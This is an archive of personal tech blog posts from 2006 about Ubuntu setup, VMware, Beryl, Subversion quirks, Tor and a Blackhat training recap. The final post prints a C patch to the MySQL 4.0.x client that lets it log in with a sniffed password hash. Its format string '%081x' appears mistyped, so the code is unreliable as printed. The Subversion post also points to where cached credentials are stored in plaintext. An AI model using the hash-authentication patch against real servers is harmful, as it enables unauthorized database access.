Crap! When I fired up Zend Studio everything inside the window was gray! What now!? I was able to locate this vague description of the problem, which is apparently due to the lack of support for XGL rendering in older versions of Java, but as you an see from the posting, it is unclear where to place the fix in the ZDE executable (the executable file to start Zend Studio). Well, since the posting was talking about Zend Studio 5.5, I decided I would try installing that and see if line 1695 in that version's ZDE made sense. Alas it didn't, so I decided it was time to get down and dirty, so I dug through the file until I found a good place for it.

Since the addition was to add an option that would use Sun's AWT toolkit when executing the Zend Studio app, I searched the file for the first instance of options, figuring I could add the specified line (options="$options -Dawt.toolkit=sun.awt.motif.MToolkit"), right after the options variable was declared, thereby ensuring that it would always end up in the execution command. I found the first place where it was declared just after this comment section:

####################################################################################
# Determining VM invocation options to use
#

#
# Verification
#

On line 1236 (please don't assume this to be the line where you should stick it), I placed the following command:

options="$options -Dawt.toolkit=sun.awt.motif.MToolkit"

Lo and behold, It finally works! After all that, I think I am going to contact Zend and charge royalties for fixing there broken crap software.

Windows Just Keeps VM-waring On Me

2006-12-20T15:43:00.000-07:00

Next post in the Ubuntu rebuild series is here! There are times when I still haven't been able to shake the need to use some Windows only apps, but since I've cut the cord with mother MS (or crazy aunt MS, might be better suited), I'm no longer going to be wasting my time with a dual boot. Instead, thanks to the bounteous goodness of virtualization giant VMware, I now have a much more attractive option. I am going to be stepping through getting VMware Server installed and running on my system. Not really very hard to do, but might as well go through it.

Doing this will allow me to install Windows (or another other useful OS for that matter) on inside my Ubuntu install and also allow me to start and stop it at will, all for the cost of a few minutes of setup. I figure you can't beat that. Once I get the basic install setup, I will save the virtual hard drive onto my file server, and thereafter, within a couple of minutes, have a fresh and so clean, clean install of Windows. Not that I really plan to use it too much, but there are always a few Windows apps that come in handy every once in a while. Not that I am anti-Windows either, because it has its place, it's just not in my everyday life anymore!

First thing's first, I need to gather the appropriate file and registration key to continue with the install. I first went out to the VMware website and downloaded the VMware Server install for Linux (.tar.gz). Doing so requires accepting their license agreement, but for free, who cares! I also had to register and request some licenses to install a copy of it. I just signed up and requested them, and then received an email containing the key. If you want, you can even ask for multiple keys at once. This really is pretty sweet, since a while back I was thinking about purchasing a copy of VMware Server, and the cheapest I could find it was for $150!

After downloading the software and getting the registration key, I used the following steps to get it installed and running:

1. Double click the installer tar.gz file and extract it.
2. cd into the vmware-server-distrib folder that you extracted.
3. Execute the install script by typing:

$ sudo ./vmware-install.pl

This should bring up a bunch of prompts that I just went through and accepted the defaults on. At one point I had to scroll through a whole hoarde of lines of the EULA, but once again, can't really complain because its so awesomely free. Then problems again. When trying to probe for an unused subnet, the program encountered an error saying that /usr/bin/vmware-ping was not found. I killed the script and tried again, getting the same error.

The fix was in this posting, where it suggested the following command:

$ sudo apt-get install ia32-libs

After installing ia32-libs, I reran the vmware-install.pl script and this time I almost all the way through, but there was an issue with the configuration script finding inetd, so I installed it:

$ sudo apt-get install inetd

I also had to create the inetd conf file, and added a blank line to it:

$ sudo nano /etc/inetd.conf

Finally, running /usr/bin/vmware-config.pl finished successfully:

$ cd /usr/bin
$ sudo ./vmware-config.pl

4. Firing up Applications->System Tools->VMware Server Console now starts up the app!

"Beryls" of Fun and Other Optical Ubuntu Confections

2006-12-18T23:14:00.000-07:00

Alright boys and girls, what is your favorite kind of candy? Some like snickers some like taffy, but my favorite kind is eye candy! Delicious! The last couple days I have been hard at work rebuilding my Ubuntu system. After a poorly performing upgrade from Dapper Drake to Edgy Eft (the AMD64 version upgrades pretty crappily), and a trip to the warranty repair shop for some hardware fixes, I decided it was time to rebuild from scratch.

After such a lame experience with the Edgy upgrade, I decided to stick with Dapper, which I installed forthwith. However being one to sometimes push the envelope, I delved into the world of graphical gratification and soon rediscovered Beryl. I had seen it before, but never got around to trying it out. Basically, it is a heshin' sweet piece of desktop graphic rendering sweetness, that adds some snazzy graphical effects such as zoom, animations, etc. right into the desktop software (in the case of my Ubuntu install, Gnome). Well, once I realized what it can do, I knew I had to taste of its sweet nectar, so I set about installing it into Dapper. Soon however, I discovered that again the support for the AMD64 kernel and software was kinda basic, so I was forced to make the upgrade to Edgy. By that point however, I had discovered that my mishaps with the previous upgrade (the installation of a not-64 bit kernel, the horribly slow graphics rendering when scrolling in Firefox, broken drivers, etc.) were the result of poor support for upgrades in the AMD64 branch.

I set about to install Edgy, and to my surprise thing are working relatively well. The fresh install from the live CD worked beautifully, and so the remainder of this post will detail how I was then able to install Beryl and get some new themes setup to take advantage of the graphics capabilities of my nVidia GeForce 440 Go graphics card. So, once I had the basic install done, the following is a list of steps I took to get Beryl up and running. Most of these steps were found on http://wiki.beryl-project.org/wiki/Install/Ubuntu/Edgy/nVIDIA

1. The first step is to get the graphics drivers installed since Beryl takes advantage of OpenGL to render graphics in the GPU. Since I have an nVidia card, I needed to install the nVidia beta driver. I decided to do this by pulling down the drivers from the mirrored repository. To do this, I added the repository by putting the following in the top of /etc/apt/sources.list:

deb http://nvidia.limitless.lupine.me.uk/ubuntu edgy stable

2. Next, I added the GPG key for the location by running:

wget http://nvidia.limitless.lupine.me.uk/ubuntu/root@lupine.me.uk.gpg -O- | sudo apt-key add -

3. Updated the package list and installed the driver by running:

sudo apt-get update
sudo apt-get install linux-restricted-modules-$(uname -r) nvidia-glx

4. Next I had to make some changes to /etc/X11/xorg.conf to use the new driver ("nvidia"). I first made a backup in case there were problems:

Section "Device"
  Identifier      ...
  Driver          "nvidia"
  BusID           ...
EndSection

5. After modifying the xorg.conf file, I rebooted the system. When it loads, it now shows the nVidia splash.

6. To insure that the nVidia driver and graphics card are actually being used, I call the OpenGL gears program (pretty much on most X systems). If the gears turn smoothly and there are no errors, the driver is working fine. Type the following in a terminal:

glxgears

7. Next I added the beryl repository to /etc/apt/source.list with the following entry:

deb http://ubuntu.beryl-project.org/ edgy main

8. After that I added the GPG key by issuing the following:

wget http://ubuntu.beryl-project.org/root@lupine.me.uk.gpg -O- | sudo apt-key add -

9. Then I made sure my system was up to date:

sudo apt-get update
sudo apt-get dist-upgrade

10. And finally issued the command to install beryl and emerald (the theme manager):

sudo apt-get install beryl emerald emerald-themes

11. Once this was done, I made a couple more changes to /etc/X11/xorg.conf:
Added the following Option line in the "Screen" section:

Section "Screen"
[...your configuration...]
Option "AddARGBGLXVisuals" "True"
EndSection

Added this to the bottom of the file:

Section "Extensions"
Option "Composite" "Enable"
EndSection

And at the expense of more graphics RAM usage I added the following to help smooth the performance:

Section "Device"
[...your configuration...]
Option "TripleBuffer" "true"
EndSection

12. To finalize these changes I then rebooted to make sure that X and Gnome would start properly with the new xorg.conf file.

13. After a successful restart, I logged in and opened a terminal before typing the following to fire up beryl:

beryl-manager

14. At this point, I was not getting any borders on my windows, so I went into /etc/X11/xorg.conf and changed the "DefaultDepth" to "24" in the "Screen" section.

15. Once I was sure that was working properly (you'll know if its not), I added it to the startup script so that it will launch at login. This is done by going to "Preferences->Sessions" and then clicking on the "Startup Programs" tab and clicking "Add". In the dialog, I entered "beryl-manager" (without quotes) to be run at login.

15. At this point, I decided to go out and find some a new theme and login prompt to go with the my new 3D graphics. There are alot of awesome graphics and theme related configurations (including many for beryl) at www.gnome-look.org
I have to admit I am pretty stoked about the sweetness of this new install. Now all I need to find is a code monkey program to write some code for me and I'll be set. My system is a Compaq Presario R3040US with an AMD64 processor and an nVidia GeForce 440 Go graphics card, so if you have a similar setup, this should work for you as well. There is also a pretty useful wiki setup at http://wiki.beryl-project.org, that also had alot of helpful info. If you get in a bind, feel free to get in touch with me and I'll be glad to help if I can.

Stay tuned for some more info on Ubuntu configuration as I finish rebuilding my machine. There's more to come in future posts.

New Meaning to My "Single-Handed" Halo Skills

2006-12-12T20:51:00.000-07:00

Ok kids, so it has been forever since I have posted. This is due to a combination of "fear factors" including but not limited to: the fear of over-caffeination (side-affect of too much Dr. Pepper to offset my lack of sleep); the fear of spousal condemnation for spending more time thinking about work than my family while at home; the fear of a DNA sucking evolutionary monster coming to cut the top of my head off with his mind before stealing forever my mutant power to spend more money than I have, while my time warping friend is powerless to stop it; and last but not least my fear of the higher education gods booting me from their presence forever after taking my future economic well-being and leaving me standing in the gutter dripping with the disappoinment of a splattering from a fresh pile of half-finished research. If you have no idea about anything that I just said, trying to explain futher will do little good, so I won't. Suffice it to say that I've found my marbles with most of those phobias so I'm back.

In the spirit of togetherness, today's post deals with the wonderful feeling of camaraderie that comes from a fellowhip of souls coming together to blast the crap out of each other's virtual alter egos in what the old fogies call "Hello Too". In this XBOX thriller, man and fanatical religious alien alike meet to take turns head bashing and high balling in attempt to win bragging rights and a few seconds of glory. Sadly however, this euphoric togetherness cannot be shared by all. There are those left out of the mix. Until now that is.

In a tribute to my good friend the "One-Armed Bandit" (I told you I'd blog about something you'd like in reward for your faithful and possibly singular following of my posts), I'd like to share with you this ergonomically brilliant hack of an XBOX 360 controller to make it...yes folks...1 handed!

Finally freedom for all! A regular doer-of-good over on one of my favorite sites hackaday.com, Ben Heck has created a 360 gamepad mod that allows the gamer to use one hand and one leg to perform the very same virtual functions that it takes most men (and women) two hands to do! Tell me that 'aint worth a Nobel Prize. At least a Newberry Award! Anyways, it is a pretty brilliant hack, assuming that the setup is really playable. I don't want to steal any of Ben's thunder, mearly suppliment it with my own "hurrah", so check out the details of the full hack over at his site. Until next time, keep the D&D dice rollin'!

HTML Motiv

2006-10-25T21:31:00.000-06:00

Wow, its been a while since I last blogged. The last month or so has been jam packed with late nights and early mornings at the office trying to get some projects done befor the holiday blitz at Doba when site usage is at its highest. That barely left me enough time to see my family, let alone get any blogging in.

At any rate here I am, back at it again. Tonights topic is one that is pretty much technically useless, so forgive me for that, but it is still pretty cool. A co-worker showed me this site the other day, and I thought it was worth mentioning because it is pretty sweet, and at least involved some techincal know how to put together. It is a Java applet that maps the contents of an HTML page into this conjoined piece of connect-the-dots artwork. As it is generated, it does this pretty sweet looking spontaneous 3D bacterial replication thing. You can check out the details at http://www.aharef.info/2006/05/websites_as_graphs.htm To see the output of your own website of choice, go to http://www.aharef.info/static/htmlgraph Above you will find an image that represents one of my favorite sites, www.hackaday.com

Wickedness And Perversion in Subversion

2006-09-30T15:05:00.000-06:00

Oh the woe. The last week and a half or so has led to some interesting Subversion related discoveries, mostly shortcomings, defects, or lack of functionality. The follow is a solution focused rant about what went wrong and how I fixed it. Let the world learn from the mistakes of the past.

First off, I have to say that I really like Subversion (SVN). It is a huge step up from CVS, which was my first introduction to versioning software. With atomic checkins (all or nothing) and a simplified database storage method (well it's a DB by default), the file based CVS heap of revision numbers is left in the dust. Since commits are atomic, each commit can be assigned a single revision number, rather than each file having a separate version number based on the number of times it has been committed.

There are also some snazzy authentication methods, something that took a pretty sizable battle to do securely in CVS. The most notable of these is Apache integration using the dav_mod module. This allows repositories to be locked down via HTTP Authentication over SSL (HTTPS), while providing a secure web-based repository browser built right in! I was really loving life using Subversion, but as always, the technology gods find something to get angry over, and soon begin raining down the chaos. Whether it is my wanton disregard of DRM or the demeaning glare of my hacker goggles I will never know, but at any rate, I was bound to eventually uncover some issues, and alas, such was the case.

As many of you are aware, I lack nothing more than my thesis to complete my MS (which has been the case for the past year and a half). Well after ditching my first topic quite a ways in, I have finally settled on the one that will carry me accross the finish line. Sponsored by Doba, it involves the development of a web-based code deployment system to deploy development code to all the various servers it needs to be on to pass through a healthy deployment process. The core of this project involves some fairly intimate interaction with our repository software Subversion. As such, I have been working on that piece of the puzzle recently: trying to access SVN commands through a php script. Urban legend has it that there are some modules written to interact with the SVN client directly for PHP, but they are certainly still in the mythical stage at this point and definitely nto suited for mission-critical use. So, my only alternative was to encapsulate some direct system calls to the SVN client with a PHP object in order to utilize its functionality.

Anyways, on to the problems at hand. Below is a list of some of the "wickedness" I have encountered of late in trying to utilize SVN, along with the eventual solutions:

Externally Linked Folder Woes
So, since we utilize a fairly significant amount of base code, whose breadth spans multiple projects across the site, it is natural to want any changes to that code to be replicated accross its many locations. That in mind, its sort of a pain to have to make changes in several places to accomplish that. Therefore, one of the best solutions is to create externally linked folders in SVN. This allows the code to be stored in a single location, but included as part of various repository folders.

In comes trouble. This apparently has a few hiccups, at least in my version of SVN (which by the way I'm forced to get through redhat, so it is a bit outdated from the most recent version). It was noticed, that in order for the working copy to recognize these new externally linked folders, you have to make it jump through a few hoops and do a little dance. First of all, the root folder of the project (in most cases the 'trunk' folder) has to be updated. Well I didn't want to update everything inside it as well, so I was forced to use the -N flag to make it non-recursive. This alone did not do the trick however. I also had to actually copy the new folders into the path in the working copy. Once I did that I was able to call svn update on the linked folders and they appeared in the SVN versioning as if they had always been there. Not sure why that was the case, but I'm told that is fixed in later versions.

Certificate Hostname Mismatch Woes
This is one of the stupidest issues I have encountered as of yet in SVN. As part of my automated deployment tool, I must execute subversion commands from a web script, which runs as the apache user. For security reasons, this user does not have any home folder, shell functionality, or other resources that conventional users do. Subversion commands however, will present an accept dialog for any less than perfect security problems they encounter, which since the web user has no shell functionality, it is impossible to connect as them and permanently accept the certificate.

Here comes the really stupid part. There used to be command flag in the earlier subversion clients that allowed you to ignore certificate warnings and accept them automatically, but it was removed because it was deemed obsolete! Idiotic decision. That means that either the certificate must be perfect (in this case it was self-signed and I was originally getting a warning because the hostname did not match, and because the CA was not trusted), or you must add the CA cert to the list of approved CA's for all clients on the server if you are going to connect through a web script. Not very friendly towards dynamically allowing the addition of new SVN servers.

So to solve this problem, I finally just had to create a new certificate with the proper hostname to solve the hostname warning, and then add the certificate's .crt file to the server hosting the web script, so that it's SVN client would ignore the CA warning error. I won't go through how to create a new certificate, since there are lots of good sites on that (try http://slacksite.com/apache/certificate.html), but I will tell you how to add the .crt file to the list of approved CA's.

To rid yourself of an invalid CA certificate error. on the SVN client server, go to /etc/subversion as root (if the folder does not exist, jsuts create it - I spent a while figuring out you could do that even with older versions of SVN). Copy the .crt file that was used to sign the offending certificate into this folder. Make sure the certificate file is world readable. Now create a file called 'servers' in the same folder (/etc/subversion), or edit the one that is already there. For added security, we only want to accept the CA for the URL of the SVN repository. So, to the 'servers' file, make the following addition (where 'mygroupname' is a name you have chosen for the group, 'host.domain' is the hostname of the server hosting the SVN repository, and 'host.domain.crt' is the name of the certificate file that you copied over):

[groups]
mygroupname = host.domain

[mygroupname]
ssl-authority-files=/etc/subversion/host.domain.crt

Now, when you connect to the repository on the specified server you should no longer get either of those certificate error warnings.

Subversion HTTP Passwords Stored in Plaintext
The final piece of subversion perversion that I want to share has to do with the fact that HTTP passwords used to connect to an SSL encrypted repository URL, are stored in plaintext on the client machine! Amazing! I know that HTTP authentication is passed in plaintext, but why would anyone use that without tunnelling it through SSL! That's even how it is recommended in the SVN documentation! So, what I don't understand, is why the client wasn't written to encrypt, or at least hash those passwords when caching them on the client. If you want to taste of what I am talking about, connect your SVN client to an HTTP or HTTPS repository location, and then check out '/home/username/.subversion/auth/svn.simple'. Do a 'cat' on one of the files in that folder and you will see the username and password plainly shown! I'm sorry, but that just amazes me as to why people still do that in this day and age!

SSH in Yo' Face!

2006-09-18T20:37:00.000-06:00

I recently encountered a rather annoying little caveat of using SSH public key authentication. I have some scripts that use public key authentication to connect to other servers and accomplish various tasks, and since they all run within an internal network, it suits me just fine. However, the other day (it appears due to a mistyped rsync command) the permissions for the user's home folder on the server I was connecting to got altered to be world read and writable (777). The following few hours were spent trying to figure out what was going on.

The main symptom was that I was able to connect to the destination server using password authentication, but for some reason, the public key authentication was not working. I went through verifying that the authorized_keys file contained the correct key for the connecting host, and even generated a new key and tried to use that. After spending a few hours fighting the battle, I had finally run out of ideas so I gave it a few days to rest. Today, upon taking a look at the problem a buddy of mine pointed out the offending file permissions. For some strange reason, SSH does not like it when the home directory has world writeable permissions. All that wnd we were back in business. It's kind of counter-intuitive if you ask me, but I guess that prevents the user from leaving sensitive keys open to being read by any user. I may not have never figured that out, so props to Andy for being so freakin' smart!

What's My IP? What's Google's IP?

2006-09-17T19:41:00.000-06:00

So it's been a while since I've posted (things have been pretty hectic). I've actually got another fairly lengthy post started about some recent issues with Subversion, but it's not done yet, so it will have to wait a bit. However, I couldn't help but take a moment to post about my recent discovery of a few moments ago.

I was working on setting up some dynamic DNS service through dyndns.org (which is free by the way), and so I was trying to figure out my external IP. After going to www.whatsmyip.com, and discovering it was some crap URL squatting site, I then decided to google "what's my ip". Aside from discovering the real URL was www.whatsmyip.org, in the search results I also noticed that the descriptions on some of the related sites disclosed the IP address (66.249.65.231) of Google's search spider (http://www.google.com/search?q=whats+my+ip&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official)!! Over a period of time, if done each time Google updates its search database (which according to my familiar source who works there, it can be anywhere from daily to every few weeks), you could begin to develop a list of their spidering IPs.

Since I'm a relatively respectful person when it comes to online activity (and my online presence is pretty freakin' small compared to the big G), this probably won't really be of any use to me. I'm sure you could also dig around and find a published list of their spidering IPs. Google I imagine is also pretty respectful when it comes to the standard robots.txt file and other spidering deterrents that sites can employ, but that doesn't mean everyone is. So I tried the same trick with several other search engines and the same result occurred. Yahoo!'s last search was coming from 72.30.215.200 (http://search.yahoo.com/search?p=what%27s+my+ip&fr=yfp-t-500&toggle=1&cop=&ei=UTF-8). AskGeeves was 65.214.44.193 (http://www.ask.com/web?q=what%27s+my+ip&o=0&l=dir&qsrc=0&qid=1F618F69063F9E097B55B544E303F854&page=2). MSN was 65.54.188.67 (http://search.msn.com/results.aspx?q=what%27s+my+ip&FORM=MSNH). The list would undoubtedly go on. Employing this tactic on a less respectable search engine site may indeed reveal some info on which IP's they are using to harass the rest of the Internet.

Pack Me a Juice Box Ma! Actually, make it 6!

2006-09-01T23:49:00.000-06:00

So alot of you that know me (I'll call you my "peeps" ), know that I am kind of a sucker for a bargain. As such, one of my regular stops on my daily tour of the world wide web is slickdeals.net. It's basically a forum site where people post great deals and amazing bargains. Despite some really good deals I seldom really find justification for buying stuff (alot of times because there are rebates involved, and sometimes even some sketchy sites that make me wary of providing credit card info), but the other day I was scanning the daily highlights and noticed a really awesome deal from overstock.com.

Target bargain: the Mattel Juice Box. Bargain price: $25.99 - $5.00 (with coupon code) + $1.00 shipping = $21.99 for a pack of 6. That's only $3.67 a piece! Now that's a bargain if I've ever seen one!

What's so great about the Juice Box? Well, it was put out by Mattel as a personal media player for kids and such. You were supposed to buy new media on these little cartridges, but it sorta fizzled out, and for the last year or so, retailers have been dumping their stock. I have been hearing about them for a while, but have never been lucky enough to find any on sale. Until now.

Oh, I could care less about having something cheap to watch little kiddie cartoons on (although my boy will probably end up with one of them). No, the real gem here is the fact that they are quite hackable. It runs under a version of uclinux, so its quite feasible to load a custom uclinux version onto it for creating things like an mp3 player, video player (albeit crappy frame-rate-wise), or even an LCD picture frame. They can even fairly easily (it seems) do some custom soldering to get them to accept SD and MMC memory cards directly. I have always been a fan of tinkering, and once I found it was quick to jump on the hardware hacking bandwagon, so this project was right up my alley (one of my favorite hardware hacking sites is www.hackaday.com). Unfortunately, until my thesis is finished, I am a bit limited on spare time for tinkering, but this hasn't stopped me from amassing a few projects in the queue. So, stay tuned in some future post for when I actually show you that I've been able to do something cool with my 6 shiny new Juice Boxes. In the meantime, below are a few of the links I've dug up so far for Juice Box projects:

Juice Box Linux Hacker forum
Juice Box Linux wiki
Juice Box Messenger Bag (on hackaday)
Juice Box eBook Reader

There are surely many more out there. I have thoughts of maybe adding a GPS receiver into one of them, or using it for text-to-speech. I guess it will all depend on how well it runs uclinix. Until then....

Flying Ice, MySQL Antics, and Teenage Stupidity

2006-08-25T15:02:00.000-06:00

It's been a while since I've posted so this will be a spattering of some of the interesting things I've encountered over the last several days. Sometimes you never realize how interesting life really is until you stop and look back on what has happened lately. So here's some of the headlines since my last post.

Flying Ice

Ever since I can remember knowing anything about the solar system, there have been nine planets. Well, not anymore. At least officially. A few days ago, at a meeting of top astronomists, phsycists, and general nut jobs somewhere in the European Union (Prague to be exact), whatever wacked out international body it is that makes those kind of decisions, voted to demote Pluto from its decades old status as a planet. In response, it suddenly disappeared into thin air (and I mean thin, this is space we are talking about). Clandestine scientists rushed to their encyclopedias, and to their horror, it no longer showed up there either. They quickly tried to reconvene to undo their dastardly doings, but it was too late. Pluto is gone forever (GASP!!!!).

Come on folks. Is that really gonna change the fact that Pluto is what it is and that's a planet. I mean, I'm fairly certain that the only people that went home and broke the last planet off their solar system model were the wack jobs that decided not to call it that anyway. On my way home from work, I listened to a piece on NPR (Yea, yea, I know. I'm still in my twenties and I listen to NPR. I also occassionaly watch documentaries and eat at Chuck-A-Rama, but no gray hairs yet.), which I found to be somewhat comical. Basically, the way it described the summit, there were so many blundering idiots arguing over how to define "planet" that the resulting resolution had a ton of contradictory statements, including a footnote that specified the 8 official planets, even though some of them didn't really fit the "official" definition. In the end, to avoid being ridiculed by the world for not being able to agree on something, they finally voted to accept the resolution, thereby turning Pluto into nothing more than a flying ball of ice (officially called a "dwarf planet").

Really, I want to know how this all got started anyhow. Rather than spend their time and public funding on actually furthering science, why not spend it arguing over how we can best nullify everything the world's school children have already learned about it. Sounds like a great use of scientific resources. Well, I'm not buying into this whole thing. Someday, when he's old enough, I am going to sit down with my boy Will and have a serious man-to-man talk about what really happened with the moon landing, and also what will surely by then have become one of the great mysteries of the universe. The fact that there really is a ninth planet and its inhabited by little cosmic midgets called plutonians.

MySQL Antics
Jer sent out an email today pointing me towards a very interesting posting about MySQL. It is an interview with MySQL CEO Martin Mickos where Guy Kawasaki asks him 10 questions about MySQL and its roots. Some of the enticing tidbits shared include how MySQL has been successful as an open source company, what types of customers they seek, who fixes their defects, and what are some strange and hefty uses of the database. Amazingly, Oracle's FAQ page utilizes a MySQL database! It was also interesting to hear about some of the massive clusters that have been utilized to leverage MySQL's simplicity and power. I was impressed with the way the company has modeled itself to take advantage of the many benefits of OSS and the community, while still being quite profitable at it. Definitely worth a read if you are at all interested in open source.

Teenage Stupidity

My final piece of happenings involves some fairly idiotic behavior on the part of a local teen. I was on my way to work the other day, and when I was only a few blocks away, I passed a pair of police motorcycles with their lights on who were stopped next to an SUV that had crashed into a vinyl fence surrounding an orchard. As I drove by I tried to determine what had caused it to careen off of the quiet residential street.

As I surveyed the scene, I noticed one of my coworkers (stuthewise) across the street snapping some digital pics. Upon arriving at work, I asked him to send me copies of the images. Check them out below.

The crash scene:

The fire hydrant across the street:

And that's where I thought the story ended. I figured someone must have had a seizure or something and passed out. Well, I was kind of right. A couple days later, my picture snapping friend pointed me towards a posting on the Daily Herald website describing what really happened. It reads:

UNCONSCIOUS DRIVER -- An 18-year-old Mapleton man passed out as he was driving Wednesday morning on 800 East at 1100 North. Two Orem police officers watching traffic in the school zone on 800 East reportedly witnessed Josh Tyler Kendrick, 18, drift off the road to the right and take out a fire hydrant, phone box and several mailboxes. Then his car veered sharply to the left, across oncoming traffic, and drove into a rail fence on the other side of the road. He became unconscious as he drifted off the road.

Orem Lt. Doug Edwards said there was evidence in the car that the driver had been inhaling computer cleaner, and was likely unconscious from those fumes. When police ran to his car to check him for injuries, he had regained consciousness and said "Wow."

Kendrick was booked into the Utah County Jail on charges of DUI, reckless driving and abuse of psychotoxic chemicals. He posted the $4,260 bail.

All I can do is quote Josh Tyler Kendrick by saying, "Wow." What an idiot. They are all around us, and as this lesson has taught me, much closer than you think. Good thing I was a few minutes late to work that day.

New feature planned for Microsoft: Learn to dance like a monkey!!

2006-08-20T21:40:00.000-06:00

So, I guess alot of people have probably seen this before, and I have just been out of the loop, but I was hanging out with a couple of the IT guys at Doba the other day, and they showed it to me. It's one of the funniest things I've seen in a while. It is some footage of Steve Ballmer, currently CEO of Microsoft, apparently at some kind of MS pep rally or developers conference or something like that. There are actually 2 clips that have been gloriously combined into and amazing techno-dance music video. This guy has got to be a freakin' PR nightmare!

So here's the first two clips in their unaltered originality:
#1 - http://www.youtube.com/watch?v=bhUAr-P_39U - "Developers, Developers!" (Is he inside of a barbed-wire corral?!)
#2 - http://www.youtube.com/watch?v=wvsboPUjrGc - "Give it up for me!"

And now, the two together at last in all their glory:
http://www.youtube.com/watch?v=8zEQhhaJsU4 - Monkey Dance

Now I can see why he would say some like he did in the quote above. Clueless.

Accessing iTunes on Linux

2006-08-14T22:54:00.000-06:00

I found a really slick tool today that I have found quite enjoyable thus far. Since my recent and wholehearted move to Ubuntu on the desktop, I have never really looked back. There are however a couple pieces of software not available to me now that I have made the open source change. One of these is iTunes, which currently only has Windows and an OSX versions. Well, there are plenty of amiable open source media players that would be fine for playing MP3's (although iTunes has very user friendly playlist management and library functionalities, so that's not really much of a downside. However, the real drawback comes when trying to listen to music shared out by other iTunes users. I had assumed this was fairly difficult without having an iTunes client. In fact, I was trying to figure out some way I could run iTunes inside of Wine. That was until today.

Enter ourTunes. This Java based iTunes client not only allows the user to view other iTunes shares on the network, there is the added bonus of also being able to download them in mp3 to the local HDD. Sweet!! And, since ourTunes is written in Java, i will run on anything with a JVM installed. With so many awesome tunes floating out there on the office network, I can now enjoy them on my Linux box without having to contrive some connived method of emulating the functionality. I had already used Synaptic Package Manager to download an appropriate JVM to be able to run Zend for my PHP development, so all I had to do was download the ourTunes jar file and fire it up, and I've been rockin' ever since.

HTTP Halitosis - Onion Routing

2006-08-13T22:59:00.000-06:00

So I know there have been alot of articles, blogs, etc. that have covered anonymous web browsing, and so this may not be much news to alot of people, however, every time it comes up and I ask people if they are familiar with Tor, I get blank stares, so I figured it was worth mentioning. I have found it quite useful in the past, although not for the same reason as it was designed. More on that in a sec.

Tor is open source and is self-proclaimed "onion routing" software. Onion as in ogre (Shrek). Its got layers. The concept is fairly simple and works well. Hundreds of other open-source groupies all over the world voluntarily run the server version of Tor. You configure the client portion on your system, and when you run your browser through the local Tor proxy, the request gets routed through several of the Tor servers all over the world before it reaches the web server you are requesting. Each node in the "layered" request only knows about the node on either side, aka where traffic came from and where it is going, so it creates an anonymous connection. At least in the simplest sense of anonymous. Just don't forget about some of the cookie tracking features that many websites employ, Google being the most notable of those (I assume that's the only search engine you use. If not, get a clue!). For more on that, and how to avoid it, check out this site.

Now, I can't say that I really worry too much about being watched by Big Brother, or anyone else for that matter, at least as far as my web surfing goes, so I haven't really used Tor for anonymous surfing much, although I do find the technology very interesting. I have however used it quite frequently to test the external facing aspects of various websites and server configurations I have developed. Since it often provides an international IP address, and at the least, a remote US one, it is perfect for testing services as they appear to the rest of the Internet. On top of that, it is alot safer than using one of the many free anonymous proxies that exist out on the web.

Ubuntuliciousness aka Bye Bye Billy

2006-08-09T18:50:00.000-06:00

So I finally decided the other day I was sick of having to run the Windows gauntlet and I would give Ubuntu Linux a try. This came after trying to get Gentoo Linux to correctly install in a dual boot environment on my Compaq R3030. I really like Gentoo because it is so configurable and can be set up to load really quickly, I kept running into issues with Grub failing to install correctly, so I popped in the Ubuntu live CD and let 'er rip. In a matter of minutes, it had installed itself on the previously partitioned space and lo and behold, Grub came up completely free of issues! To my amazement, I also found the apt-get functionality used for installing and updating packages to be very efficient and the few minor hitches I had were fairly simple to overcome with a quick trip to the Ubuntu forums.

The one exception to that has been getting my wireless card to function properly, so I have been tethered to the wall, until I can get that working. I think it has something to do with the hardware shutoff button that I have on my laptop, so if anyone has any ideas, let me know. I've tried several things, but nothing works yet.

At any rate, inspired by the success on my laptop, I made the move at work and am now running Ubuntu on my desktop there. To be honest, now that I have it set up, I really don't miss Windows one bit. I have tried several Linux distros over the years, and Ubuntu really has dazzled me since it is so easy to update and navigate. It certainly helps to have some advanced Linux know how, but I really think they have succeeded in making a big leap to provide something viable for the desktop for the Linux novice. I am even pleased with how well OpenOffice integrates with documents saved in MS Office formats. Oh, and I can't say enough about how well that Evolution (the default email application) integrates with Exchange. Really, the list goes on.

In addition to my move to Ubuntu, I have also been playing around with VMWare Server, which VMWare started giving out for free not too long ago. There is a slick Linux distribution of the software that I was able to install with relative ease. Unfortunately I haven't been able to completely untether myself from Windows, since I have been doing some penatration testing on our network and require a few Windows only tools. VMWare however, has provided an outsanding solution to that problem, and since Doba provides me with a fairly beefy development machine, I have no problem running the Windows VM on top of my Ubuntu install.

So, after all the different flavors of Linux I've tried over the years, and despite my initial skepticism of diving into yet another, evolution has proved itself as this latest mainstream distro has won me over with its vastly improved characteristics. So much so, I think from now on I'll spend most of my time outside of Redmond.

Blackhat Recap

2006-08-06T22:10:00.000-06:00

So I made it home tonight after spending a couple days out in California following Blackhat, so its time for my final recap. My last Blackhat training session was "Advanced Database Security Assesment" put on by a couple guys from NGS Software, and as I mentioned in the previous post, its first day didn't really live up to expectations. Well to be honest, neither did day 2, but it was still worthwhile. The presenters were both fairly entertaining, there were just too many technical difficulties to really get a good flow, including the fact that the VMWare demo images they gave us used British keyboard layouts and were incompatible with our US laptops. I am going to take the course materials and go through them again (and this time hopefully I can get alot of the demos to work), because there was alot of good stuff in there, they just didn't have much in the live demo department.

I was mostly interested in the MySQL material they presented, and they covered all of the major database implementations, so most of the material wasn't MySQL related, but there were some good gems in there. These included a couple of key MySQL authentication vulnerabilities: mainly one that allows the password hash to be used for authentication (if local network access is available, it can easily be sniffed off the wire) by patching a custom MySQL client. Chris Anley (who was not one of the session presenters), is the primary MySQL researcher at NGS, and has written some fairly interesting white papers if you are interested in MySQL security, the most notable of these being "Hack Proofing MySQL".

At any rate, the most interesting MySQL vulnerability is the hash authentication that can be done by modifying and compiling a custom client. This exists within the 4.0.x source tree and can be exploited by adding the following function into the password.c file in libmysql:

void use_hash(ulong *result, const char *password) {
if( strlen( password ) != 16 )
return;
sscanf( password, "%081x%081x", &(result[0]), &(result[1]) );
return;
}

Then, inside the scramble method, the following line should be removed (or commented out):

hash_password(hash_pass,password);

And replaced with the following line:

use_hash(hash_pass,password);

The client can then be recompiled and used to authenticate to the server using the password hash instead of the actual password.

